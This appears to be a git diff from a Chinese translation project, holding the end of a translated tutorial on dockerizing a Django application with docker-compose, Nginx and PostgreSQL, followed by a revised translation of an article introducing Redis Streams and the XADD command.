使用 curl 命令将最新版本的 docker-compose 下载到 `/usr/local/bin` 目录,并使用 chmod 命令使其有执行权限。
|
||||||
|
|
||||||
|
运行以下命令:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo curl -L https://github.com/docker/compose/releases/download/1.21.0/docker-compose-$(uname -s)-$(uname -m) -o /usr/local/bin/docker-compose
|
||||||
|
sudo chmod +x /usr/local/bin/docker-compose
|
||||||
|
```
|
||||||
|
|
||||||
|
现在检查 docker-compose 版本。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose version
|
||||||
|
```
|
||||||
|
|
||||||
|
确保你安装的是最新版本的 docker-compose 1.21。
|
||||||
|
|
||||||
|
[![安装 Docker-compose](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/4.png)][17]
|
||||||
|
|
||||||
|
已安装支持 compose 文件版本 3 的 docker-compose 最新版本。
|
||||||
|
|
||||||
|
### 步骤 3 - 配置项目环境
|
||||||
|
|
||||||
|
在这一步中,我们将配置 Python Django 项目环境。我们将创建新目录 'guide01',并使其成为我们项目文件的主目录,例如 Dockerfile,Django 项目,nginx 配置文件等。
|
||||||
|
|
||||||
|
登录到 'omar' 用户。
|
||||||
|
|
||||||
|
```
|
||||||
|
su - omar
|
||||||
|
```
|
||||||
|
|
||||||
|
创建一个新目录 'guide01',并进入目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
mkdir -p guide01
|
||||||
|
cd guide01/
|
||||||
|
```
|
||||||
|
|
||||||
|
现在在 'guide01' 目录下,创建两个新目录 'project' 和 'config'。
|
||||||
|
|
||||||
|
```
|
||||||
|
mkdir project/ config/
|
||||||
|
```
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
* 'project' 目录:我们所有的 python Django 项目文件都将放在该目录中。
|
||||||
|
|
||||||
|
* 'config' 目录:项目配置文件的目录,包括 nginx 配置文件,python pip requirements 文件等。
|
||||||
|
|
||||||
|
### 创建一个新的 requirements.txt 文件
|
||||||
|
|
||||||
|
接下来,使用 vim 命令在 'config' 目录中创建一个新的 requirements.txt 文件
|
||||||
|
|
||||||
|
```
|
||||||
|
vim config/requirements.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
粘贴下面的配置。
|
||||||
|
|
||||||
|
```
|
||||||
|
Django==2.0.4
|
||||||
|
gunicorn==19.7.0
|
||||||
|
psycopg2==2.7.4
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
### 创建 Dockerfile
|
||||||
|
|
||||||
|
在 'guide01' 目录下创建新文件 'Dockerfile'。
|
||||||
|
|
||||||
|
运行以下命令。
|
||||||
|
|
||||||
|
```
|
||||||
|
vim Dockerfile
|
||||||
|
```
|
||||||
|
|
||||||
|
现在粘贴下面的 Dockerfile 脚本。
|
||||||
|
|
||||||
|
```
|
||||||
|
FROM python:3.5-alpine
|
||||||
|
ENV PYTHONUNBUFFERED 1
|
||||||
|
|
||||||
|
RUN apk update && \
|
||||||
|
apk add --virtual build-deps gcc python-dev musl-dev && \
|
||||||
|
apk add postgresql-dev bash
|
||||||
|
|
||||||
|
RUN mkdir /config
|
||||||
|
ADD /config/requirements.txt /config/
|
||||||
|
RUN pip install -r /config/requirements.txt
|
||||||
|
RUN mkdir /src
|
||||||
|
WORKDIR /src
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
我们想要为我们的 Django 项目构建基于 Alpine Linux 的 Docker 镜像,Alpine 是最小的 Linux 版本。我们的 Django 项目将运行在带有 Python3.5 的 Alpine Linux 上,并添加 postgresql-dev 包以支持 PostgreSQL 数据库。然后,我们将使用 python pip 命令安装在 'requirements.txt' 上列出的所有 Python 包,并为我们的项目创建新目录 '/src'。
|
||||||
|
|
||||||
|
### 创建 Docker-compose 脚本
|
||||||
|
|
||||||
|
使用 [vim][18] 命令在 'guide01' 目录下创建 'docker-compose.yml' 文件。
|
||||||
|
|
||||||
|
```
|
||||||
|
vim docker-compose.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
粘贴以下配置内容。
|
||||||
|
|
||||||
|
```
|
||||||
|
version: '3'
|
||||||
|
services:
|
||||||
|
db:
|
||||||
|
image: postgres:10.3-alpine
|
||||||
|
container_name: postgres01
|
||||||
|
nginx:
|
||||||
|
image: nginx:1.13-alpine
|
||||||
|
container_name: nginx01
|
||||||
|
ports:
|
||||||
|
- "8000:8000"
|
||||||
|
volumes:
|
||||||
|
- ./project:/src
|
||||||
|
- ./config/nginx:/etc/nginx/conf.d
|
||||||
|
depends_on:
|
||||||
|
- web
|
||||||
|
web:
|
||||||
|
build: .
|
||||||
|
container_name: django01
|
||||||
|
command: bash -c "python manage.py makemigrations && python manage.py migrate && python manage.py collectstatic --noinput && gunicorn hello_django.wsgi -b 0.0.0.0:8000"
|
||||||
|
depends_on:
|
||||||
|
- db
|
||||||
|
volumes:
|
||||||
|
- ./project:/src
|
||||||
|
expose:
|
||||||
|
- "8000"
|
||||||
|
restart: always
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
使用这个 docker-compose 文件脚本,我们将创建三个服务。使用 PostgreSQL alpine Linux 创建名为 'db' 的数据库服务,再次使用 Nginx alpine Linux 创建 'nginx' 服务,并使用从 Dockerfile 生成的自定义 docker 镜像创建我们的 python Django 容器。
|
||||||
|
|
||||||
|
[![配置项目环境](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/5.png)][19]
|
||||||
|
|
||||||
|
### 配置 Django 项目
|
||||||
|
|
||||||
|
将 Django 项目文件复制到 'project' 目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/django
|
||||||
|
cp -r * ~/guide01/project/
|
||||||
|
```
|
||||||
|
|
||||||
|
进入 'project' 目录并编辑应用程序设置 'settings.py'。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/guide01/project/
|
||||||
|
vim hello_django/settings.py
|
||||||
|
```
|
||||||
|
|
||||||
|
注意:
|
||||||
|
|
||||||
|
我们将部署名为 'hello_django' 的简单 Django 应用程序。
|
||||||
|
|
||||||
|
在 'ALLOW_HOSTS' 行中,添加服务名称 'web'。
|
||||||
|
|
||||||
|
```
|
||||||
|
ALLOW_HOSTS = ['web']
|
||||||
|
```
|
||||||
|
|
||||||
|
现在更改数据库设置,我们将使用 PostgreSQL 数据库,'db' 数据库作为服务运行,使用默认用户和密码。
|
||||||
|
|
||||||
|
```
|
||||||
|
DATABASES = {
|
||||||
|
'default': {
|
||||||
|
'ENGINE': 'django.db.backends.postgresql_psycopg2',
|
||||||
|
'NAME': 'postgres',
|
||||||
|
'USER': 'postgres',
|
||||||
|
'HOST': 'db',
|
||||||
|
'PORT': 5432,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
至于 'STATIC_ROOT' 配置目录,将此行添加到文件行的末尾。
|
||||||
|
|
||||||
|
```
|
||||||
|
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
|
||||||
|
```
|
||||||
|
|
||||||
|
保存并退出。
|
||||||
|
|
||||||
|
[![配置 Django 项目](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/6.png)][20]
|
||||||
|
|
||||||
|
现在我们准备在 docker 容器下构建和运行 Django 项目。
|
||||||
|
|
||||||
|
### 步骤 4 - 构建并运行 Docker 镜像
|
||||||
|
|
||||||
|
在这一步中,我们想要使用 'guide01' 目录中的配置为我们的 Django 项目构建一个 Docker 镜像。
|
||||||
|
|
||||||
|
进入 'guide01' 目录。
|
||||||
|
|
||||||
|
```
|
||||||
|
cd ~/guide01/
|
||||||
|
```
|
||||||
|
|
||||||
|
现在使用 docker-compose 命令构建 docker 镜像。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose build
|
||||||
|
```
|
||||||
|
|
||||||
|
[![运行 docker 镜像](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/7.png)][21]
|
||||||
|
|
||||||
|
启动 docker-compose 脚本中的所有服务。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
等待几分钟让 Docker 构建我们的 Python 镜像并下载 nginx 和 postgresql docker 镜像。
|
||||||
|
|
||||||
|
[![使用 docker-compose 构建镜像](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/8.png)][22]
|
||||||
|
|
||||||
|
完成后,使用以下命令检查运行容器并在系统上列出 docker 镜像。
|
||||||
|
|
||||||
|
```
|
||||||
|
docker-compose ps
|
||||||
|
docker-compose images
|
||||||
|
```
|
||||||
|
|
||||||
|
现在,你将在系统上运行三个容器并列出 Docker 镜像,如下所示。
|
||||||
|
|
||||||
|
[![docke-compose ps 命令](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/9.png)][23]
|
||||||
|
|
||||||
|
我们的 Python Django 应用程序现在在 docker 容器内运行,并且已经创建了为我们服务的 docker 镜像。
|
||||||
|
|
||||||
|
### 步骤 5 - 测试
|
||||||
|
|
||||||
|
打开 Web 浏览器并使用端口 8000 键入服务器地址,我的是:http://ovh01:8000/
|
||||||
|
|
||||||
|
现在你将获得默认的 Django 主页。
|
||||||
|
|
||||||
|
[![默认 Django 项目主页](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/10.png)][24]
|
||||||
|
|
||||||
|
接下来,通过在 URL 上添加 “/admin” 路径来测试管理页面。
|
||||||
|
|
||||||
|
http://ovh01:8000/admin/
|
||||||
|
|
||||||
|
然后你将会看到 Django admin 登录页面。
|
||||||
|
|
||||||
|
[![Django administration](https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/11.png)][25]
|
||||||
|
|
||||||
|
Docker 化 Python Django 应用程序已成功完成。
|
||||||
|
|
||||||
|
### 参考
|
||||||
|
|
||||||
|
* [https://docs.docker.com/][13]
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/
|
||||||
|
|
||||||
|
作者:[Muhammad Arul][a]
|
||||||
|
译者:[MjSeven](https://github.com/MjSeven)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/
|
||||||
|
[1]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-a-new-requirementstxt-file
|
||||||
|
[2]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-the-nginx-virtual-host-file-djangoconf
|
||||||
|
[3]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-the-dockerfile
|
||||||
|
[4]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#create-dockercompose-script
|
||||||
|
[5]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#configure-django-project
|
||||||
|
[6]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#what-we-will-do
|
||||||
|
[7]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-install-dockerce
|
||||||
|
[8]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-install-dockercompose
|
||||||
|
[9]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-configure-project-environment
|
||||||
|
[10]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-build-and-run-the-docker-image
|
||||||
|
[11]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#step-testing
|
||||||
|
[12]:https://www.howtoforge.com/tutorial/docker-guide-dockerizing-python-django-application/#reference
|
||||||
|
[13]:https://docs.docker.com/
|
||||||
|
[14]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/1.png
|
||||||
|
[15]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/2.png
|
||||||
|
[16]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/3.png
|
||||||
|
[17]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/4.png
|
||||||
|
[18]:https://www.howtoforge.com/vim-basics
|
||||||
|
[19]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/5.png
|
||||||
|
[20]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/6.png
|
||||||
|
[21]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/7.png
|
||||||
|
[22]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/8.png
|
||||||
|
[23]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/9.png
|
||||||
|
[24]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/10.png
|
||||||
|
[25]:https://www.howtoforge.com/images/docker_guide_dockerizing_python_django_application/big/11.png
|
@ -1,184 +1,183 @@
|
|||||||
streams:一个新的 Redis 通用数据结构
|
Streams:一个新的 Redis 通用数据结构
|
||||||
==================================
|
======
|
||||||
|
|
||||||
直到几个月以前,对于我来说,在消息传递的环境中,streams 只是一个有趣且相对简单的概念。在 Kafka 流行这个概念之后,我主要研究它们在 Disque 实例中的用途。Disque 是一个将会转变为 Redis 4.2 模块的消息队列。后来我发现 Disque 全都是 AP 消息,它将在不需要客户端过多参与的情况下实现容错和保证送达,因此,我认为 streams 的概念在那种情况下并不适用。
|
|
||||||
|
|
||||||
然而同时,在 Redis 中有一个问题,那就是缺省情况下导出数据结构并不轻松。它在 Redis 列表、排序集和发布/订阅(Pub/Sub)能力之间有某些缺陷。你可以权衡使用这些工具去模拟一个消息或事件的序列。
|
|
||||||
|
|
||||||
排序集是大量耗费内存的,不能自然的模拟一次又一次的相同消息的传递,客户端不能阻塞新消息。因为一个排序集并不是一个序列化的数据结构,它是一个元素可以根据它们量的变化而移动的集合:它不是很像时间系列一样的东西。
|
直到几个月以前,对于我来说,在消息传递的环境中,<ruby>流<rt>streams</rt></ruby>只是一个有趣且相对简单的概念。这个概念在 Kafka 流行之后,我主要研究它们在 Disque 案例中的应用,Disque 是一个消息队列,它将在 Redis 4.2 中被转换为 Redis 的一个模块。后来我决定让 Disque 都用 AP 消息[1],也就是说,它将在不需要客户端过多参与的情况下实现容错和可用性,这样一来,我更加确定地认为流的概念在那种情况下并不适用。
|
||||||
|
|
||||||
列表有另外的问题,它在某些特定的用例中产生类似的适用性问题:你无法浏览列表中部是什么,因为在那种情况下,访问时间是线性的。此外,没有任何的指定输出功能,列表上的阻塞操作仅为单个客户端提供单个元素。列表中没有固定的元素标识,也就是说,不能指定从哪个元素开始给我提供内容。
|
然而在那时 Redis 有个问题,那就是缺省情况下导出数据结构并不轻松。它在 Redis <ruby>列表<rt>list</rt></ruby>、<ruby>有序集合<rt>sorted list</rt></ruby>、<ruby>发布/订阅<rt>Pub/Sub</rt></ruby>功能之间有某些缺陷。你可以权衡使用这些工具对一个消息或事件建模。
|
||||||
|
|
||||||
|
排序集合是内存消耗大户,那自然就不能对投递相同消息进行一次又一次的建模,客户端不能阻塞新消息。因为有序集合并不是一个序列化的数据结构,它是一个元素可以根据它们量的变化而移动的集合:所以它不像时序性的数据那样。
|
||||||
|
|
||||||
|
列表有另外的问题,它在某些特定的用例中产生类似的适用性问题:你无法浏览列表中间的内容,因为在那种情况下,访问时间是线性的。此外,没有任何指定输出的功能,列表上的阻塞操作仅为单个客户端提供单个元素。列表中没有固定的元素标识,也就是说,不能指定从哪个元素开始给我提供内容。
|
||||||
|
|
||||||
|
对于一对多的工作任务,有发布/订阅机制,它在大多数情况下是非常好的,但是,对于某些不想<ruby>“即发即弃”<rt>fire-and-forget</rt></ruby>的东西:保留一个历史是很重要的,不只是因为是断开之后重新获得消息,也因为某些如时序性的消息列表,用范围查询浏览是非常重要的:在这 10 秒范围内温度读数是多少?
|
||||||
|
|
||||||
|
我试图解决上述问题,我想规划一个通用的有序集合,并列入一个独特的、更灵活的数据结构,然而,我的设计尝试最终以生成一个比当前的数据结构更加矫揉造作的结果而告终。Redis 有个好处,它的数据结构导出更像自然的计算机科学的数据结构,而不是 “Salvatore 发明的 API”。因此,我最终停止了我的尝试,并且说,“ok,这是我们目前能提供的”,或许我会为发布/订阅增加一些历史信息,或者为列表访问增加一些更灵活的方式。然而,每次在会议上有用户对我说 “你如何在 Redis 中模拟时间系列” 或者类似的问题时,我的脸就绿了。
|
||||||
|
|
||||||
|
### 起源
|
||||||
|
|
||||||
|
在 Redis 4.0 中引入模块之后,用户开始考虑他们自己怎么去修复这些问题。其中一个用户 Timothy Downs 通过 IRC 和我说道:
|
||||||
|
|
||||||
|
\<forkfork> 我计划给这个模块增加一个事务日志式的数据类型 —— 这意味着大量的订阅者可以在不导致 redis 内存激增的情况下做一些像发布/订阅那样的事情
|
||||||
|
\<forkfork> 订阅者持有他们在消息队列中的位置,而不是让 Redis 必须维护每个消费者的位置和为每个订阅者复制消息
|
||||||
|
|
||||||
|
他的思路启发了我。我想了几天,并且意识到这可能是我们马上同时解决上面所有问题的契机。我需要去重新构思 “日志” 的概念是什么。日志是个基本的编程元素,每个人都使用过它,因为它只是简单地以追加模式打开一个文件,并以一定的格式写入数据。然而 Redis 数据结构必须是抽象的。它们在内存中,并且我们使用内存并不是因为我们懒,而是因为使用一些指针,我们可以概念化数据结构并把它们抽象,以使它们摆脱明确的限制。例如,一般来说日志有几个问题:偏移不是逻辑化的,而是真实的字节偏移,如果你想要与条目插入的时间相关的逻辑偏移应该怎么办?我们有范围查询可用。同样,日志通常很难进行垃圾回收:在一个只能进行追加操作的数据结构中怎么去删除旧的元素?好吧,在我们理想的日志中,我们只需要说,我想要数字最大的那个条目,而旧的元素一个也不要,等等。
|
||||||
|
|
||||||
|
当我从 Timothy 的想法中受到启发,去尝试着写一个规范的时候,我使用了 Redis 集群中的 radix 树去实现,优化了它内部的某些部分。这为实现一个有效利用空间的日志提供了基础,而且仍然可以用<ruby>对数时间<rt>logarithmic time</rt></ruby>来访问范围。同时,我开始去读关于 Kafka 流以获得另外的灵感,它也非常适合我的设计,最后借鉴了 Kafka <ruby>消费群体<rt>consumer groups</rt></ruby>的概念,并且再次针对 Redis 进行优化,以适用于 Redis 在内存中使用的情况。然而,该规范仅停留在纸面上,在一段时间后我几乎把它从头到尾重写了一遍,以便将我与别人讨论的所得到的许多建议一起增加到 Redis 升级中。我希望 Redis 流能成为对于时间序列有用的特性,而不仅是一个常见的事件和消息类的应用程序。
|
||||||
|
|
||||||
|
### 让我们写一些代码吧
|
||||||
|
|
||||||
|
从 Redis 大会回来后,整个夏天我都在实现一个叫 listpack 的库。这个库是 `ziplist.c` 的继任者,那是一个表示在单个分配中的字符串元素列表的数据结构。它是一个非常特殊的序列化格式,其特点在于也能够以逆序(从右到左)解析:以便在各种用例中替代 ziplists。
|
||||||
|
|
||||||
|
结合 radix 树和 listpacks 的特性,它可以很容易地去构建一个空间高效的日志,并且还是可索引的,这意味着允许通过 ID 和时间进行随机访问。自从这些就绪后,我开始去写一些代码以实现流数据结构。我还在完成这个实现,不管怎样,现在在 Github 上的 Redis 的 streams 分支里它已经可以跑起来了。我并没有声称那个 API 是 100% 的最终版本,但是,这有两个有意思的事实:一,在那时只有消费群组是缺失的,加上一些不太重要的操作流的命令,但是,所有的大的方面都已经实现了。二,一旦各个方面比较稳定了之后,我决定大概用两个月的时间将所有的流的特性<ruby>向后移植<rt>backport</rt></ruby>到 4.0 分支。这意味着 Redis 用户想要使用流,不用等待 Redis 4.2 发布,它们在生产环境马上就可用了。这是可能的,因为作为一个新的数据结构,几乎所有的代码改变都出现在新的代码里面。除了阻塞列表操作之外:该代码被重构了,我们对于流和列表阻塞操作共享了相同的代码,而极大地简化了 Redis 内部实现。
|
||||||
|
|
||||||
|
### 教程:欢迎使用 Redis 的 streams
|
||||||
|
|
||||||
|
在某些方面,你可以认为流是 Redis 列表的一个增强版本。流元素不再是一个单一的字符串,而是一个<ruby>字段<rt>field</rt></ruby>和<ruby>值<rt>value</rt></ruby>组成的对象。范围查询更适用而且更快。在流中,每个条目都有一个 ID,它是一个逻辑偏移量。不同的客户端可以<ruby>阻塞等待<rt>blocking-wait</rt></ruby>比指定的 ID 更大的元素。Redis 流的一个基本的命令是 `XADD`。是的,所有的 Redis 流命令都是以一个 `X` 为前缀的。
|
||||||
|
|
||||||
对于一到多的工作任务,有发布/订阅机制,它在大多数情况下是非常好的,但是,对于某些不想“即发即弃”的东西:保留一个历史是很重要的,而不是断开之后重新获得消息,也因为某些消息列表,像时间系列,用范围查询浏览是非常重要的:在这 10 秒范围内我的温度读数是多少?
|
|
||||||
|
|
||||||
这有一种方法可以尝试处理上面的问题,我计划对排序集进行通用化,并列入一个唯一的、更灵活的数据结构,然而,我的设计尝试最终以生成一个比当前的数据结构更加矫揉造作的结果而结束。一个关于 Redis 数据结构导出的更好的想法是,让它更像天然的计算机科学的数据结构,而不是,“Salvatore 发明的 API”。因此,在最后我停止了我的尝试,并且说,“ok,这是我们目前能提供的”,或许,我将为发布/订阅增加一些历史信息,或者将来对列表访问增加一些更灵活的方式。然而,每次在会议上有用户对我说“你如何在 Redis 中模拟时间系列” 或者类似的问题时,我的脸就绿了。
|
|
||||||
|
|
||||||
### 起源
|
|
||||||
|
|
||||||
在 Redis 4.0 中引入模块之后,用户开始去看他们自己怎么去修复这些问题。他们中的一个,Timothy Downs,通过 IRC 写信给我:
|
|
||||||
|
|
||||||
\<forkfork> 这个模块,我计划去增加一个事务日志式的数据类型 —— 这意味着大量的订阅者可以在没有大量增加 redis 内存使用的情况下做一些像发布/订阅那样的事情
|
|
||||||
\<forkfork> 订阅者保持它在消息队列中的位置,而不是让 Redis 必须维护每个消费者的位置和为每个订阅者复制消息
|
|
||||||
|
|
||||||
这激发了我的想像力。我想了几天,并且意识到这可能是我们立刻同时解决上面所有问题的契机。我需要去重新构想 “日志” 的概念是什么。它是个基本的编程元素,每个人都使用过它,因为它只是简单地以追加模式打开一个文件,并以一定的格式写入数据。然而 Redis 数据结构必须是抽象的。它们在内存中,并且我们使用内存并不是因为我们懒,而是因为使用一些指针,我们可以概念化数据结构并把它们抽象,以允许它们摆脱明显的限制。对于正常的例子来说,日志有几个问题:偏移不是逻辑的,而是真实的字节偏移,如果你想要与条目插入的时间相关的逻辑偏移,我们有范围查询可用。同样的,日志通常很难进行垃圾收集:在一个只追加的数据结构中怎么去删除旧的元素?好吧,在我们理想的日志中,我们只是说,我想要编号最大的那个条目,而旧的元素一个也不要,等等。
|
|
||||||
|
|
||||||
当我从 Timothy 的想法萌芽,去尝试着写一个规范的时候,我使用了我用于 Redis 集群中的 radix 树实现,优化了它内部的某些部分。这为实现一个有效利用空间的日志提供了基础,而仍然可以用对数时间来访问范围。同时,我开始去读关于 Kafka 流以获得另外的灵感,它也非常适合我的设计,并且产生了一个 Kafka 消费组的概念,并且,理想化的话,它可以用于 Redis 和内存用例。然而,该规范仅维持了几个月,在一段时间后我几乎把它从头到尾重写了一遍,以便将我与别人讨论的即将增加到 Redis 中的内容所得到的许多建议一起升级。我希望 Redis 流是非常有用的,尤其对于时间序列,而不仅是用于事件和消息类的应用程序。
|
|
||||||
|
|
||||||
### 让我们写一些代码
|
|
||||||
|
|
||||||
从 Redis 大会回来后,在整个夏天,我实现了一个称为 “listpack” 的库。这个库是 ziplist.c 的继任者,那是一个表示在单个分配中的字符串元素列表的数据结构。它是一个非常特殊的序列化格式,其特点在于也能够以逆序(从右到左)解析:需要它以便在各种用例中替代 ziplists。
|
|
||||||
|
|
||||||
结合 radix 树和 listpacks,它可以很容易地去构建一个日志,它同时也是非常空间高效的,并且是索引化的,这意味着允许通过 ID 和时间进行随机访问。自从这些就绪后,我开始去写一些代码以实现流数据结构。我最终完成了该实现,不管怎样,现在,在 Github 上的 Redis 的 “streams” 分支里面,它已经可以跑起来了。我并没有声称那个 API 是 100% 的最终版本,但是,这有两个有趣的事实:一是,在那时,只有消费组是缺失的,加上一些不那么重要的命令去操作流,但是,所有的大的方面都已经实现了。二是,一旦各个方面比较稳定了之后 ,决定大概用两个月的时间将所有的流的工作向后移植到 4.0 分支。这意味着 Redis 用户为了使用流,不用等待 Redis 4.2,它们在生产环境马上就可用了。这是可能的,因为作为一个新的数据结构,几乎所有的代码改变都出现在新的代码里面。除了阻塞列表操作之外:该代码被重构了,我们对于流和列表阻塞操作共享了相同的代码,而极大地简化了 Redis 内部。
|
|
||||||
|
|
||||||
### 教程:欢迎使用 Redis 流
|
|
||||||
|
|
||||||
在某些方面,你可以认为流是 Redis 列表的一个增强版本。流元素不再是一个单一的字符串,它们更多是一个<ruby>域<rt>field</rt></ruby>和<ruby>值<rt>value</rt></ruby>组成的对象。范围查询更适用而且更快。流中的每个条目都有一个 ID,它是一个逻辑偏移量。不同的客户端可以<ruby>阻塞等待<rt>blocking-wait</rt></ruby>比指定的 ID 更大的元素。Redis 流的一个基本的命令是 XADD。是的,所有的 Redis 流命令都是以一个“X”为前缀的。
|
|
||||||
|
|
||||||
```
|
```
|
||||||
> XADD mystream * sensor-id 1234 temperature 10.5
|
> XADD mystream * sensor-id 1234 temperature 10.5
|
||||||
1506871964177.0
|
1506871964177.0
|
||||||
```
|
```
|
||||||
|
|
||||||
这个 `XADD` 命令将追加指定的条目作为一个指定的流 “mystream” 的新元素。在上面的示例中的这个条目有两个域:`sensor-id` 和 `temperature`,每个条目在同一个流中可以有不同的域。使用相同的域名字可以更好地利用内存。一个有趣的事情是,域的排序是可以保证顺序的。XADD 仅返回插入的条目的 ID,因为在第三个参数中是星号(`*`),表示我们邀请命令自动生成 ID。一般情况下需求如此,但是,也可以去强制指定一个 ID,这种情况用于复制这个命令到被动服务器和 AOF 文件。
|
这个 `XADD` 命令将追加指定的条目作为一个指定的流 —— “mystream” 的新元素。上面示例中的这个条目有两个字段:`sensor-id` 和 `temperature`,每个条目在同一个流中可以有不同的字段。使用相同的字段名可以更好地利用内存。有意思的是,字段的排序是可以保证顺序的。`XADD` 仅返回插入的条目的 ID,因为在第三个参数中是星号(`*`),表示由命令自动生成 ID。通常这样做就够了,但是也可以去强制指定一个 ID,这种情况用于复制这个命令到<ruby>从服务器<rt>slave server</rt></ruby>和 <ruby>AOF<rt>append-only file</rt></ruby> 文件。
|
||||||
|
|
||||||
这个 ID 是由两部分组成的:一个毫秒时间和一个序列号。`1506871964177` 是毫秒时间,它仅是一个毫秒级的 UNIX 时间。圆点(`.`)后面的数字 `0`,是一个序列号,它是为了区分相同毫秒数的条目增加上去的。这两个数字都是 64 位的无符号整数。这意味着在流中,我们可以增加所有我们想要的条目,即使是在同一毫秒中。ID 的毫秒部分使用 Redis 服务器的当前本地时间生成的 ID 和流中的最后一个条目 ID 两者间的最大的一个。因此,对实例来说,即使是计算机时间向后跳,这个 ID 仍然是增加的。在某些情况下,你可以认为流条目的 ID 是完整的 128 位数字。然而,现实是,它们与被添加的实例的本地时间有关,这意味着我们可以在毫秒级的精度的范围随意查询。
|
这个 ID 是由两部分组成的:一个毫秒时间和一个序列号。`1506871964177` 是毫秒时间,它只是一个毫秒级的 UNIX 时间戳。圆点(`.`)后面的数字 `0` 是一个序号,它是为了区分相同毫秒数的条目增加上去的。这两个数字都是 64 位的无符号整数。这意味着,我们可以在流中增加所有想要的条目,即使是在同一毫秒中。ID 的毫秒部分使用 Redis 服务器的当前本地时间生成的 ID 和流中的最后一个条目 ID 两者间的最大的一个。因此,举例来说,即使是计算机时间回跳,这个 ID 仍然是增加的。在某些情况下,你可以认为流条目的 ID 是完整的 128 位数字。然而,事实上它们与被添加到的实例的本地时间有关,这意味着我们可以在毫秒级的精度的范围随意查询。
|
||||||
|
|
||||||
如你想像的那样,以一个非常快速的方式去添加两个条目,结果是仅序列号增加。我可以使用一个 `MULTI`/`EXEC` 块去简单模拟“快速插入”,如下:
|
正如你想的那样,快速添加两个条目后,结果是仅一个序号递增了。我们可以用一个 `MULTI`/`EXEC` 块来简单模拟“快速插入”:
|
||||||
|
|
||||||
```
|
```
|
||||||
> MULTI
|
> MULTI
|
||||||
OK
|
OK
|
||||||
> XADD mystream * foo 10
|
> XADD mystream * foo 10
|
||||||
QUEUED
|
QUEUED
|
||||||
> XADD mystream * bar 20
|
> XADD mystream * bar 20
|
||||||
QUEUED
|
QUEUED
|
||||||
> EXEC
|
> EXEC
|
||||||
1) 1506872463535.0
|
1) 1506872463535.0
|
||||||
2) 1506872463535.1
|
2) 1506872463535.1
|
||||||
```
|
```
|
||||||
|
|
||||||
在上面的示例中,也展示了无需在开始时指定任何<ruby>模式<rt>schema</rt></ruby>的情况下,对不同的条目使用不同的域。会发生什么呢?每个块(它通常包含 50 - 150 个消息内容)的每一个信息被用作参考。并且,有相同域的连续条目被使用一个标志进行压缩,这个标志表明与“这个块中的第一个条目的相同域”。因此,对于连续消息使用相同域可以节省许多内存,即使是域的集合随着时间发生缓慢变化。
|
|
||||||
|
|
||||||
为了从流中检索数据,这里有两种方法:范围查询,它是通过 `XRANGE` 命令实现的;以及流式,它是通过 XREAD 命令实现的。`XRANGE` 命令仅取得包括从开始到停止范围内的条目。因此,对于实例,如果我知道它的 ID,我可以取得单个条目,像这样:
|
|
||||||
|
|
||||||
```
|
